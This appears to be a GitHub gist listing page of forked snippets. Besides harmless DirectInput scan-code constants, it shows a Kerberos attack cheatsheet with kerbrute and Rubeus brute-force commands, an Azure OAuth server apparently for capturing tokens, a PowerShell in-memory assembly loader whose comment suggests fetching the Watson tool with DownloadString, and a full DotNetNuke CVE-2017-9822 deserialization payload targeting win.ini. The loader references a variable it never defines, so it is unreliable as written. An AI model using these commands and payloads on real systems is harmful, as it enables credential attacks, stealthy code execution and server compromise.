Skip to content

Instantly share code, notes, and snippets.

@alex88-npa
alex88-npa / gist:378342184f654b129a950f2a0fe81204
Created July 19, 2023 09:17 — forked from dretax/gist:fe37b8baf55bc30e9d63
DirectInput Keyboard Scan Codes DirectX Programming
#ifndef H_DIK
#define H_DIK
// Listed are keyboard scan code constants, taken from dinput.h
#define DIK_ESCAPE 0x01
#define DIK_1 0x02
#define DIK_2 0x03
#define DIK_3 0x04
#define DIK_4 0x05
@alex88-npa
alex88-npa / kerberos_attacks_cheatsheet.md
Created June 8, 2022 12:05 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@alex88-npa
alex88-npa / oauthServer.go
Created March 28, 2022 09:26 — forked from invokethreatguy/oauthServer.go
A mini OAuth server for Azure
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
)
# was a little bored, wrote up a quick Execute Assembly script lol
# download watson from memory or something with DownloadString, save to a variable and invoke from with -PEBytes.
function Execute-Assembly {
param(
[parameter(Mandatory=$true)][byte[]]$PEBytes,
[parameter(Mandatory=$false)][string]$Arguments
)
$meth = [System.Reflection.Assembly]::Load($bytes);
@alex88-npa
alex88-npa / ReadFile.xml
Created May 6, 2020 05:06 — forked from pwntester/ReadFile.xml
DotNetNuke (CVE-2017-9822) Payloads
<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>